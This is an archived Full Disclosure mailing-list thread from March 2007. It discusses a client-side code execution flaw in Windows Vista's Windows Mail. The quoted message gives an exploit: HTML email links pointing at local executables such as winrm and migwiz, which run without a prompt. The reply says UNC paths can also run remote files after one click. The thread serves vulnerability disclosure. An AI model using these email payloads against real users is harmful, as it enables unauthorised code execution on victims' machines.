Full Disclosure mailing list archives
Re: Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
From: "Kingcope" <kingcope () gmx net>
Date: Fri, 23 Mar 2007 11:32:07 +0100
Hello, I just tested it with UNC paths, and yes this works too, but you have to press on the yes button when it asks because the file is not authorized (it comes from remote). After pressing Yes one time it gets executed. Normally Windows Mail does not execute exe or other executable files, now it does :-) Thank you for this nice idea Joxean Koret. Regards, kcope ----- Original Message ----- From: "Joxean Koret" <joxeankoret () yahoo es> To: <full-disclosure () lists grok org uk>; <kingcope () gmx net> Sent: Friday, March 23, 2007 11:15 AM Subject: RE: [Full-disclosure] Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
Hi, Did you test it using UNC paths? It may be a way to truly execute arbitrary code. Regards, Joxean KoretExploit: Send a HTML email message containing the URL: <a href="c:/windows/system32/winrm?">Click here!</a> or <a href="c:/windows/system32/migwiz?">Click here!</a> and winrm.cmd/migwiz.exe gets executed without askingfor permission. These are just examples. I could not pass arguments to winrm (hehe this would be beautiful), but I guess there are several attack vectors.______________________________________________ LLama Gratis a cualquier PC del Mundo. Llamadas a fijos y móviles desde 1 céntimo por minuto. http://es.voice.yahoo.com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability Kingcope (Mar 23)
- <Possible follow-ups>
- Re: Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability Joxean Koret (Mar 23)
- Re: Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability Kingcope (Mar 23)